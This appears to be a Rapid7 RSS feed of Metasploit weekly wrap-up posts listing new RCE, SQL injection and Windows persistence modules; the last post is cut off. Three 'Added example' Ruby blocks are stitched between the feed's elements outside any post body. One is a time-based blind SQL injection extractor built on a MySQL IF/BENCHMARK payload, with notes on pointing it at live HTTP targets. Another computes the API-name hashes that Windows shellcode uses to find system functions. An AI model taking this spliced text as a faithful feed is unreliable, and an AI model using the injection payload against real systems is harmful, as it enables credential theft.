<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:dc="http://purl.org/dc/elements/1.1/"
   xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom"
   version="2.0" xmlns:media="http://search.yahoo.com/mrss/">
  <channel>
    <title><![CDATA[ Metasploit - Rapid7 Cybersecurity Blog ]]></title>
    <description><![CDATA[Rapid7 transforms data into insight, empowering security professionals to progress and protect their organizations.]]></description>
    <link>https://www.rapid7.com/blog/</link>
    <image>
      <url>https://blog.rapid7.com/favicon.png</url>
      <title>Rapid7 Cybersecurity Blog</title>
      <link>https://www.rapid7.com/blog/</link>
    </image>
    <lastBuildDate>Mon, 20 Apr 2026 03:17:22 GMT</lastBuildDate>
    <atom:link href="https://www.rapid7.com/tag/metasploit/rss" rel="self" type="application/rss+xml" />
    <ttl>60</ttl>
    <item>
      <title><![CDATA[Metasploit Wrap-Up 04/17/2026]]></title>
      <description><![CDATA[<h2>Happy Friday - Seven New Metasploit Modules</h2><p>We’re happy to announce that Metasploit Framework had a big week, landing seven new modules alongside various bug fixes and enhancements. This week’s highlights include RCE modules targeting AVideo, openDCIM, Selenium Grid/Selenoid, and ChurchCRM. On the post-exploitation side, Windows saw three new persistence techniques added as modules, targeting Telemetry scheduled tasks, PowerShell profiles, and Microsoft BITS.</p><p>What a time to be alive as a Metasploit user! We wish you all a wonderful weekend and happy hacking.</p><h2>New module content (7)</h2><h3>AVideo Unauthenticated SQL Injection Credential Dump</h3><p>Authors: Valentin Lobstein <a href="mailto:chocapikk@leakix.net">chocapikk@leakix.net</a> and arkmarta</p><p>Type: Auxiliary</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21075">#21075</a> contributed by <a href="https://github.com/Chocapikk">Chocapikk</a></p><p>Path: gather/avideo_catname_sqli</p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2026-28501&amp;referrer=blog">CVE-2026-28501</a></p><p>Description: Adds an auxiliary module for CVE-2026-28501, an unauthenticated SQL injection in AVideo &lt;= 22.0, along with a new BenchmarkBasedBlind SQLi mixin class and blind extraction improvements.</p><h3>openDCIM install.php SQL Injection to RCE</h3><p>Author: Valentin Lobstein <a href="mailto:chocapikk@leakix.net">chocapikk@leakix.net</a></p><p>Type: Exploit</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21034">#21034</a> contributed by <a href="https://github.com/Chocapikk">Chocapikk</a></p><p>Path: linux/http/opendcim_install_sqli_rce</p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2026-28517&amp;referrer=blog">CVE-2026-28517</a></p><p>Description: This PR adds a new exploit module for openDCIM that chains three vulnerabilities (<a 
href="https://github.com/advisories/GHSA-mg2w-x76x-59h8">https://github.com/advisories/GHSA-mg2w-x76x-59h8</a>, <a href="https://github.com/advisories/GHSA-prmh-rp39-qc4m">https://github.com/advisories/GHSA-prmh-rp39-qc4m</a>, <a href="https://github.com/advisories/GHSA-428h-8xhf-g3cw">https://github.com/advisories/GHSA-428h-8xhf-g3cw</a>) to achieve remote code execution.</p><h3>Selenium Grid/Selenoid Unauthenticated RCE</h3><p>Authors: Jon Stratton, Takahiro Yokoyama, Valentin Lobstein <a href="mailto:chocapikk@leakix.net">chocapikk@leakix.net</a>, and Wiz Research</p><p>Type: Exploit</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21003">#21003</a> contributed by <a href="https://github.com/Chocapikk">Chocapikk</a></p><p>Path: linux/http/selenium_greed_rce</p><p>Description: This replaces the two separate Selenium Grid RCE modules (Chrome and Firefox) with a single unified module that auto-detects available browsers and selects the best attack vector. The module targets unauthenticated Selenium Grid and Selenoid instances, supporting two techniques: a Firefox profile handler injection that works on all Grid versions including the latest (never patched since 2021), and a Chrome binary override for Grid versions prior to 4.11.0 and all Selenoid versions. No authentication is required.</p><h3>ChurchCRM Database Restore RCE 6.2.0</h3><p>Author: LucasCsmt</p><p>Type: Exploit</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21095">#21095</a> contributed by <a href="https://github.com/LucasCsmt">LucasCsmt</a></p><p>Path: multi/http/churchcrm_db_restore_rce</p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2025-68109&amp;referrer=blog">CVE-2025-68109</a></p><p>Description: Adds a new exploit module for CVE-2025-68109, targeting a file upload vulnerability inside ChurchCRM leading to an RCE. 
This module will work on version 6.2.0 of ChurchCRM and earlier.</p><h3>Windows Persistence Bits Job</h3><p>Author: h00die</p><p>Type: Exploit</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20839">#20839</a> contributed by <a href="https://github.com/h00die">h00die</a></p><p>Path: windows/persistence/bits</p><p>Description: This adds a new persistence module that uses a Microsoft BITS (Background Intelligent Transfer Service) job to maintain access to the system.</p><h3>Powershell Profile Persistence</h3><p>Author: madefourit</p><p>Type: Exploit</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20933">#20933</a> contributed by <a href="https://github.com/madefourit">madefourit</a></p><p>Path: windows/persistence/powershell_profile</p><p>Description: This adds a new persistence module that uses PowerShell profiles (scripts that run whenever PowerShell starts) to maintain access.</p><h3>Windows Telemetry Persistence</h3><p>Author: h00die</p><p>Type: Exploit</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20843">#20843</a> contributed by <a href="https://github.com/h00die">h00die</a></p><p>Path: windows/persistence/telemetry</p><p>Description: Adds a new persistence module, exploit/windows/persistence/telemetry, that abuses the Windows Telemetry scheduled task (Microsoft Compatibility Appraiser / CompatTelRunner) to establish persistence. The module writes a payload to disk and configures the telemetry task to execute it, resulting in a SYSTEM-level Meterpreter session either on the next scheduled run or immediately on demand. 
Requires an admin-level Meterpreter session on the target.</p><h2>Enhancements and features (11)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/21078">#21078</a> from <a href="https://github.com/Chocapikk">Chocapikk</a> - Adds multiple improvements to the multi/http/churchcrm_install_unauth_rce module.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21085">#21085</a> from <a href="https://github.com/dledda-r7">dledda-r7</a> - This refactors the Block API code used by Windows payloads to use a new version of the hashing algorithm. It also fixes a bug whereby the UNICODE_STRING MaximumLength field (the size of the allocation) was used to bound the module name when hashing it, when the Length field (the number of bytes actually in use) should have been used.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21236">#21236</a> from <a href="https://github.com/bcoles">bcoles</a> - Adds riscv64le and riscv32le architecture support to the fileless fetch payload adapter. This enables in-memory ELF execution via memfd_create on RISC-V Linux targets without writing to disk.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21252">#21252</a> from <a href="https://github.com/zeroSteiner">zeroSteiner</a> - Adds a new with_adcs_certificate_request method that is now used by both the MsIcpr and WebEnrollment mixins. It abstracts away the enrollment process and takes a block that performs the actual request, so the status messages and the post-processing of a successfully issued certificate live in one place.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21255">#21255</a> from <a href="https://github.com/mxnvel">mxnvel</a> - This updates two Python payloads (cmd/unix/reverse_python and cmd/unix/reverse_python_ssl) to make the PythonPath option optional. 
When omitted, it defaults to a shim that determines the appropriate Python version at runtime using a small bash expression.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21275">#21275</a> from <a href="https://github.com/adfoster-r7">adfoster-r7</a> - Adds multiple improvements to the cve_2025_14847_mongobleed module, such as a dedicated check method, improved compression support detection (only zlib can be exploited), and fixes for other false positives.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21286">#21286</a> from <a href="https://github.com/Hemang360">Hemang360</a> - Adds a cleanup keyword argument to Msf::Post::File#mkdir so callers can skip automatic directory cleanup registration. This is useful for persistence modules that create directories which must remain on the target after the session ends.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21289">#21289</a> from <a href="https://github.com/sjanusz-r7">sjanusz-r7</a> - Updates the db.hosts RPC call to additionally include the comments associated with the host.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21291">#21291</a> from <a href="https://github.com/sjanusz-r7">sjanusz-r7</a> - Updates the module.info RPC call to additionally include the notes associated with the module.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21304">#21304</a> from <a href="https://github.com/adfoster-r7">adfoster-r7</a> - Improves multiple auxiliary module check code messages and statuses.</li></ul><h2>Bugs fixed (4)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/21027">#21027</a> from <a href="https://github.com/SilentSobs">SilentSobs</a> - Fixes ELF shared object (elf-so) payload generation failing on 32-bit ARM Linux and RISC-V 32-bit LE targets. 
The _start entry point in the ARM LE template was landing at a non-word-aligned offset, which violates the architecture's 4-byte alignment requirement and caused the shared object to fail to load. The templates now use proper NASM align directives to ensure correct entry point alignment, and a similar fix is applied to the RISC-V 32-bit LE template.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21268">#21268</a> from <a href="https://github.com/adfoster-r7">adfoster-r7</a> - Fixes a crash with a small number of auxiliary modules when the check method was run and the vulnerability wasn't present.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21287">#21287</a> from <a href="https://github.com/zeroSteiner">zeroSteiner</a> - Fixes the EXE templates that were rebuilt in <a href="https://github.com/rapid7/metasploit-framework/pull/20502">https://github.com/rapid7/metasploit-framework/pull/20502</a> to work on legacy Windows targets like Server 2000 in case you find yourself in a combination hacking and time-travelling movie.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21309">#21309</a> from <a href="https://github.com/sfewer-r7">sfewer-r7</a> - Fixes a false positive in the fortinet_fortiweb_create_admin module when detecting the presence of an authentication bypass via path traversal vulnerability in the Fortinet FortiWeb management interface.</li></ul><h2>Documentation added (1)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/20843">#20843</a> from <a href="https://github.com/h00die">h00die</a> - Adds a new persistence module, exploit/windows/persistence/telemetry, that abuses the Windows Telemetry scheduled task (Microsoft Compatibility Appraiser / CompatTelRunner) to establish persistence. 
The module writes a payload to disk and configures the telemetry task to execute it, resulting in a SYSTEM-level Meterpreter session either on the next scheduled run or immediately on demand. Requires an admin-level Meterpreter session on the target.</li></ul><p>You can always find more documentation on our docsite at <a href="https://docs.metasploit.com/">docs.metasploit.com</a>.</p><h2>Get it</h2><p>As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:</p><ul><li><a href="https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222026-04-08T15%3A01%3A17Z..2026-04-16T14%3A22%3A51%2B01%3A00%22">Pull Requests 6.4.126...6.4.128</a></li><li><a href="https://github.com/rapid7/metasploit-framework/compare/6.4.126...6.4.128">Full diff 6.4.126...6.4.128</a></li></ul><p>If you are a git user, you can clone the <a href="https://github.com/rapid7/metasploit-framework">Metasploit Framework repo</a> (master branch) for the latest. To install fresh without using git, you can use the open-source-only <a href="https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers">Nightly Installers</a> or the commercial edition <a href="https://www.rapid7.com/products/metasploit/download/">Metasploit Pro</a>.</p>]]></description>
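<![CDATA[<p>Added example (Ruby), not the AVideo module's code or the BenchmarkBasedBlind mixin: the benchmark-based blind extraction technique the module relies on, with a bisection search over the byte value of each character. The inner query, the injection point and the fake backend, which reports a simulated delay instead of sleeping, are constructed for illustration; only the MySQL IF/BENCHMARK payload shape is the real primitive.</p>

```ruby
# Time-based blind SQLi extraction using MySQL BENCHMARK() as the delay
# primitive, with a bisection search over the byte value of each character.
# Added example; not code from Metasploit or the AVideo module.

# Constructed secret that stands in for the value the injected query would
# return on a real target (a hypothetical users table).
SECRET = 'admin:5f4dcc3b'.freeze

# Builds the injected payload for one (position, midpoint) probe. The inner
# query is a placeholder; the outer IF/BENCHMARK shape is standard MySQL.
def benchmark_payload(query, pos, mid, loops = 5_000_000)
  "' AND IF(ORD(SUBSTRING((#{query}),#{pos},1))>#{mid}," \
    "BENCHMARK(#{loops},SHA1(1)),0)-- -"
end

# Fake transport standing in for an HTTP request to the vulnerable endpoint.
# It parses the probe back out of the payload, evaluates it against SECRET,
# and returns a simulated round-trip time in seconds rather than sleeping.
def fake_request(payload)
  m = payload.match(/,(\d+),1\)\)>(\d+),BENCHMARK/)
  pos, mid = m[1].to_i, m[2].to_i
  ch = SECRET[pos - 1]            # SUBSTRING past the end yields '' (ORD == 0)
  (ch && ch.ord > mid) ? 1.8 : 0.05
end

# Extracts the query result one character at a time. `threshold` is the
# round-trip time (seconds) above which a probe counts as true; a real
# implementation calibrates it from baseline requests first.
def extract(query, max_len: 64, threshold: 1.0, request: method(:fake_request))
  out = +''
  (1..max_len).each do |pos|
    lo, hi = 0, 127                  # 7-bit range: exactly 7 probes per char
    while lo < hi
      mid = (lo + hi) / 2
      if request.call(benchmark_payload(query, pos, mid)) >= threshold
        lo = mid + 1                 # ORD(c) > mid
      else
        hi = mid                     # ORD(c) <= mid
      end
    end
    break if lo.zero?                # ORD('') == 0: past the end of the string
    out << lo.chr
  end
  out
end

if __FILE__ == $PROGRAM_NAME
  puts extract('SELECT password FROM users LIMIT 1')
end
```

<p>In live use the request callable issues the HTTP request and returns the measured round-trip time, and the threshold is calibrated against a few baseline requests first, because network jitter rather than the injected delay is the usual source of false positives in timing-based extraction.</p>]]>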
      <link>https://www.rapid7.com/blog/post/pt-metasploit-wrap-up-04-17-2026</link>
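<![CDATA[<p>Added example (Ruby), not Metasploit's Block API code, illustrating the Length versus MaximumLength distinction behind #21085. It uses the classic Block API scheme, ROR-13 accumulated over the upper-cased UTF-16LE module name and then over the NUL-terminated ASCII function name, with the two parts summed; the UNICODE_STRING buffers are constructed, and the newer hashing variant the PR introduces is not described on the page and is not reproduced here.</p>

```ruby
# Why the module-name hash must be bounded by UNICODE_STRING.Length and not
# MaximumLength. Added example; not the Metasploit Block API code.

# Rotate a 32-bit value right by n bits.
def ror32(v, n)
  ((v >> n) | (v << (32 - n))) & 0xFFFFFFFF
end

# Classic Block API accumulation: for each byte, h = ror13(h) + byte.
def ror13_hash(bytes)
  bytes.each_byte.reduce(0) { |h, b| (ror32(h, 13) + b) & 0xFFFFFFFF }
end

# A UNICODE_STRING as the loader holds it: Length is the bytes in use,
# MaximumLength the allocation size, Buffer the UTF-16LE characters.
# `tail` models whatever the allocation happens to contain past Length
# (constructed here: the NUL terminator, optionally followed by stale bytes).
def unicode_string(name, tail)
  chars = name.encode('UTF-16LE').b
  { length: chars.bytesize,
    maximum_length: chars.bytesize + tail.bytesize,
    buffer: chars + tail.b }
end

# Upper-case ASCII letters byte-wise, as the shellcode does (0x61..0x7A - 0x20).
def upcase_bytes(bytes)
  bytes.each_byte.map { |b| b.between?(0x61, 0x7A) ? b - 0x20 : b }.pack('C*')
end

# Hash the module name over `count` bytes of the buffer.
def module_hash(ustr, count)
  ror13_hash(upcase_bytes(ustr[:buffer][0, count]))
end

# Full export hash: module part + function part (ASCII name with its NUL).
def block_api_hash(ustr, function, use_length: true)
  count = use_length ? ustr[:length] : ustr[:maximum_length]
  (module_hash(ustr, count) + ror13_hash(function + "\x00")) & 0xFFFFFFFF
end

# Two loader entries for the same DLL whose allocations differ only past
# Length; the constant a payload embeds must not depend on that difference.
TAIL_A = "\x00\x00".b                                              # terminator only
TAIL_B = "\x00\x00" + 'ws2_32.dll'.encode('UTF-16LE').b[0, 10]     # plus stale bytes

K32_A = unicode_string('kernel32.dll', TAIL_A)
K32_B = unicode_string('kernel32.dll', TAIL_B)

if __FILE__ == $PROGRAM_NAME
  printf("Length-bounded:        %08x %08x\n",
         block_api_hash(K32_A, 'LoadLibraryA'),
         block_api_hash(K32_B, 'LoadLibraryA'))
  printf("MaximumLength-bounded: %08x %08x\n",
         block_api_hash(K32_A, 'LoadLibraryA', use_length: false),
         block_api_hash(K32_B, 'LoadLibraryA', use_length: false))
end
```

<p>MaximumLength describes the allocation, so anything past Length gets folded into the hash and the resolver silently fails to match the constant the payload was built with. Bounding by Length makes the hash a function of the name alone, which is what the fix restores.</p>]]>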
      <guid isPermaLink="false">bltfbdf377c52786428</guid>
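<![CDATA[<p>Added example (Ruby), not Metasploit's ELF template or payload code, showing the check behind #21027: whether an ELF image's entry point is aligned as its architecture requires. It parses only the ELF header and builds its own sample headers inline. Assumptions: RISC-V is treated as needing 4-byte alignment (with the C extension 2 bytes would suffice), and ARM needs 4 bytes for an A32 entry but only 2 for a Thumb entry, which the low bit of the address signals.</p>

```ruby
# Check that an ELF image's entry point (e_entry) satisfies the instruction
# alignment of its architecture. Added example; not Metasploit's code.

ELF_MAGIC = "\x7FELF".b
EM_ARM    = 40
EM_RISCV  = 243

# Parse just the fields we need from an ELF32 or ELF64 header.
def parse_elf_header(bytes)
  raise ArgumentError, 'not an ELF image' unless bytes.b[0, 4] == ELF_MAGIC
  ei_class = bytes.getbyte(4)          # 1 = ELF32, 2 = ELF64
  ei_data  = bytes.getbyte(5)          # 1 = little-endian, 2 = big-endian
  le = (ei_data == 1)
  e_machine = bytes[18, 2].unpack1(le ? 'v' : 'n')
  e_entry =
    case ei_class
    when 1 then bytes[24, 4].unpack1(le ? 'V' : 'N')
    when 2 then bytes[24, 8].unpack1(le ? 'Q<' : 'Q>')
    else raise ArgumentError, "bad EI_CLASS #{ei_class}"
    end
  { class: ei_class, machine: e_machine, entry: e_entry }
end

# Alignment (bytes) the entry address must satisfy for the given machine.
# Assumptions: RISC-V without the C extension needs 4; ARM needs 4 for A32
# and 2 for Thumb, which is signalled by the low bit of the address.
def required_alignment(machine, entry)
  case machine
  when EM_ARM   then entry.odd? ? 2 : 4
  when EM_RISCV then 4
  else 1                                # other machines: not checked here
  end
end

# true when the entry point is acceptably aligned for its architecture.
def entry_aligned?(bytes)
  hdr = parse_elf_header(bytes)
  align = required_alignment(hdr[:machine], hdr[:entry])
  addr = (hdr[:machine] == EM_ARM) ? (hdr[:entry] & ~1) : hdr[:entry]  # drop Thumb bit
  (addr % align).zero?
end

# Constructed ELF32 little-endian header (ET_DYN, no program/section headers)
# so the check can run on sample input without a real shared object.
def build_elf32_header(machine, entry)
  ident = ELF_MAGIC + [1, 1, 1, 0].pack('C4') + ("\x00" * 8)
  ident + [3, machine, 1, entry, 52, 0, 0, 52, 32, 0, 0, 0, 0].pack('vvVVVVVvvvvvv')
end

# Same for ELF64 little-endian.
def build_elf64_header(machine, entry)
  ident = ELF_MAGIC + [2, 1, 1, 0].pack('C4') + ("\x00" * 8)
  ident + [3, machine, 1, entry, 64, 0, 0, 64, 56, 0, 0, 0, 0].pack('vvVQ<Q<Q<Vvvvvvv')
end

if __FILE__ == $PROGRAM_NAME
  [[EM_ARM, 0x1000], [EM_ARM, 0x1002], [EM_ARM, 0x1003], [EM_RISCV, 0x1002]].each do |m, e|
    printf("machine=%3d entry=0x%x aligned=%s\n", m, e, entry_aligned?(build_elf32_header(m, e)))
  end
end
```

<p>Run against the first 64 bytes of a generated shared object (for example msfvenom elf-so output), the same check flags the case the fix addresses: an A32 _start at an address that is 2-byte but not 4-byte aligned.</p>]]>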
      <category><![CDATA[Metasploit]]></category>
      <category><![CDATA[Metasploit Weekly Wrapup]]></category><dc:creator><![CDATA[Jack Heysel]]></dc:creator>
      <pubDate>Fri, 17 Apr 2026 20:35:42 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt0d50271a40a5f14f/6849ab419621d9f3824d5017/metasploit-sky.png" medium="image" />
    </item>
    <item>
      <title><![CDATA[Metasploit Wrap-Up 04/10/2026]]></title>
<description><![CDATA[<h2>Speedup Improvements of MSFVenom & New Modules</h2><p>This week, we added new modules to Metasploit Framework targeting Cisco Catalyst SD-WAN controllers and osTicket, along with a new AD CS Web Enrollment certificate module. The Windows service-for-user persistence technique also received updates, and the LDAP/ADCS-related modules now automatically report the services they interact with, producing richer data that can be queried with the services command.</p><p>We also landed an improvement to msfvenom’s startup time, thanks to <a href="https://github.com/bcoles">bcoles</a>, giving roughly a 2x speedup.</p><h2>New module content (4)</h2><h3>AD/CS Authenticated Web Enrollment Services Module</h3><p>Authors: Spencer McIntyre, bwatters-r7, and jhicks-r7</p><p>Type: Auxiliary</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20752">#20752</a> contributed by <a href="https://github.com/bwatters-r7">bwatters-r7</a></p><p>Path: admin/http/web_enrollment_cert</p><p>Description: This adds a new auxiliary/admin/http/web_enrollment_cert module that allows certificates to be issued from an Active Directory Certificate Services Web Enrollment portal. Its usage is the same as the auxiliary/admin/http/icpr_cert module, but it enables operators to issue certificates when the web enrollment portal is accessible and the MS-ICPR service is not.</p><h3>Cisco Catalyst SD-WAN Controller Authentication Bypass</h3><p>Author: sfewer-r7</p><p>Type: Auxiliary</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21158">#21158</a> contributed by <a href="https://github.com/sfewer-r7">sfewer-r7</a></p><p>Path: admin/networking/cisco_sdwan_auth_bypass</p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2026-20127&amp;referrer=blog">CVE-2026-20127</a></p><p>Description: This adds an auxiliary module to exploit CVE-2026-20127, an authentication bypass vulnerability affecting Cisco Catalyst SD-WAN Controller. 
It was recently exploited in the wild as a zero-day.</p><h3>osTicket Arbitrary File Read via PHP Filter Chains in mPDF</h3><p>Authors: Arkaprabha Chakraborty &lt;@t1nt1nsn0wy&gt; and HORIZON3.ai Team</p><p>Type: Auxiliary</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20948">#20948</a> contributed by <a href="https://github.com/ArkaprabhaChakraborty">ArkaprabhaChakraborty</a></p><p>Path: gather/osticket_arbitrary_file_read</p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2026-22200&amp;referrer=blog">CVE-2026-22200</a></p><p>Description: This adds an auxiliary module to exploit CVE-2026-22200, an authenticated arbitrary file read vulnerability in osTicket reached through PHP filter chains in mPDF.</p><h3>Windows Service for User (S4U) Scheduled Task Persistence - Event Trigger</h3><p>Authors: Brandon McCann "zeknox" <a href="mailto:bmccann@accuvant.com">bmccann@accuvant.com</a>, Thomas McCarthy "smilingraccoon" <a href="mailto:smilingraccoon@gmail.com">smilingraccoon@gmail.com</a>, and h00die</p><p>Type: Exploit</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20814">#20814</a> contributed by <a href="https://github.com/h00die">h00die</a></p><p>Path: windows/persistence/service_for_user/event</p><p>Description: Adds the event-triggered variant of the Windows service-for-user (S4U) scheduled task persistence technique as its own module, windows/persistence/service_for_user/event.</p><h2>Enhancements and features (7)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/20814">#20814</a> from <a href="https://github.com/h00die">h00die</a> - Updates the Windows service-for-user persistence technique.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20973">#20973</a> from <a href="https://github.com/bitstr3m-48">bitstr3m-48</a> - This release enables command execution for non-interactive HWBridge sessions via the sessions -c flag. 
Additionally, the hwbridge/connect module now preserves parsed JSON error bodies from failed HTTP responses, which improves error messaging.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20977">#20977</a> from <a href="https://github.com/g0tmi1k">g0tmi1k</a> - This updates the exploit/unix/webapp/php_eval module to have a FORMDATA datastore option, which adds HTTP POST-request support and makes the HEADERS datastore option consistent with other modules.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20979">#20979</a> from <a href="https://github.com/g0tmi1k">g0tmi1k</a> - This updates the exploit/unix/webapp/php_include module with additional datastore options and makes its usage more consistent with the similar exploit/unix/webapp/php_eval module.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21031">#21031</a> from <a href="https://github.com/zeroSteiner">zeroSteiner</a> - Enhances Metasploit’s LDAP/ADCS-related modules to automatically report related services (LDAP, DCERPC/ICertPassage/ADCS CA) and to improve vulnerability reporting by associating findings with the affected LDAP object’s DN (and, for ADCS template findings, the template name) so results are uniquely keyed and easier to interpret.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21143">#21143</a> from <a href="https://github.com/SaiSakthidar">SaiSakthidar</a> - This bumps the Metasploit payloads to include changes that enable the PHP Meterpreter to open TCP server sockets. This enables operators to listen for inbound connections on compromised hosts and closes a feature gap between PHP and the other Meterpreters.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21229">#21229</a> from <a href="https://github.com/bcoles">bcoles</a> - This updates the msfvenom utility to use the metadata cache. 
The result is roughly 2x faster execution times when listing modules.</li></ul><h2>Bugs fixed (1)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/21153">#21153</a> from <a href="https://github.com/Nayeraneru">Nayeraneru</a> - This fixes an issue with some mutable constant datastore options: changing the visibility of shared options such as CHOST or CPORT in one module no longer affects other modules.</li></ul><h2>Documentation added (1)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/21221">#21221</a> from <a href="https://github.com/cgranleese-r7">cgranleese-r7</a> - This PR improves module_doc_template.md with examples to better guide contributors.</li></ul><p>You can always find more documentation on our docsite at <a href="https://docs.metasploit.com/">docs.metasploit.com</a>.</p><h2>Get it</h2><p>As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:</p><ul><li><a href="https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222026-04-02T10%3A24%3A13Z..2026-04-08T15%3A01%3A17Z%22">Pull Requests 6.4.125...6.4.126</a></li><li><a href="https://github.com/rapid7/metasploit-framework/compare/6.4.125...6.4.126">Full diff 6.4.125...6.4.126</a></li></ul><p>If you are a git user, you can clone the <a href="https://github.com/rapid7/metasploit-framework">Metasploit Framework repo</a> (master branch) for the latest. To install fresh without using git, you can use the open-source-only <a href="https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers">Nightly Installers</a> or the commercial edition <a href="https://www.rapid7.com/products/metasploit/download/">Metasploit Pro</a>.</p>]]></description>
      <link>https://www.rapid7.com/blog/post/pt-metasploit-wrap-up-04-10-2026</link>
      <guid isPermaLink="false">blte1ac7b403beedf01</guid>
      <category><![CDATA[Metasploit]]></category>
      <category><![CDATA[Metasploit Weekly Wrapup]]></category><dc:creator><![CDATA[Simon Janusz]]></dc:creator>
      <pubDate>Fri, 10 Apr 2026 19:11:43 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt7464fe659cab8a01/6852c358419e54d8e21c3458/blog-metasploit-wrap-up-.webp" medium="image" />
    </item>
    <item>
      <title><![CDATA[Metasploit Wrap-Up 04/03/2026]]></title>
<description><![CDATA[<h2>Additional Adapters and More Modules</h2><p>This week, we added a new set of HTTP/HTTPS fetch-based CMD payloads for x64 and x86 versions of Windows. The additional breadth of selectable payloads and delivery techniques gives users more options to tailor the attack workflow to their environment. This was contributed by <a href="https://github.com/bwatters-r7">bwatters-r7</a>. Adding new architectures for adapted payloads is surprisingly easy and something a first-time contributor might want to look into!</p><p>New modules added to Metasploit Framework also allow for targeting FreeScout and Grav CMS, both resulting in remote code execution. These modules were contributed by <a href="https://github.com/Chocapikk">Chocapikk</a> and <a href="https://github.com/x1o3">x1o3</a> respectively. Thanks!</p><p>Thanks to <a href="https://github.com/g0tmi1k">g0tmi1k</a>, Metasploit Framework now also includes an exploit module, multi/http/os_cmd_exec, for generic HTTP command execution vulnerabilities where user-supplied input is passed directly to system execution functions via an HTTP request. 
This can result in a Meterpreter shell on the remote target.</p><p>To round this week off, we have a new persistence technique on Windows, thanks to <a href="https://github.com/Nayeraneru">Nayeraneru</a>, which abuses the HKCU\Environment\UserInitMprLogonScript registry value to execute a payload at user logon.</p><h2>New module content (5)</h2><h3>FreeScout Unauthenticated RCE via ZWSP .htaccess Bypass</h3><p>Authors: Moses Bhardwaj (MosesOX), Nir Zadok (nirzadokox), Valentin Lobstein <a href="mailto:chocapikk@leakix.net">chocapikk@leakix.net</a>, and offensiveee</p><p>Type: Exploit</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21069">#21069</a> contributed by <a href="https://github.com/Chocapikk">Chocapikk</a></p><p>Path: multi/http/freescout_htaccess_rce</p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2026-27636&amp;referrer=blog">CVE-2026-27636</a></p><p>Description: This adds an exploit module for CVE-2026-28289, an unauthenticated remote code execution vulnerability in FreeScout versions up to and including 1.8.206.</p><h3>Grav CMS Admin Direct Install Authenticated Plugin Upload RCE</h3><p>Authors: binneko and x1o3</p><p>Type: Exploit</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21029">#21029</a> contributed by <a href="https://github.com/x1o3">x1o3</a></p><p>Path: multi/http/grav_admin_direct_install_rce_cve_2025_50286</p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2025-50286&amp;referrer=blog">CVE-2025-50286</a></p><p>Description: This adds a new exploit module for CVE-2025-50286, an authenticated RCE vulnerability in Grav CMS 1.1.x–1.7.x with Admin Plugin 1.2.x–1.10.x. 
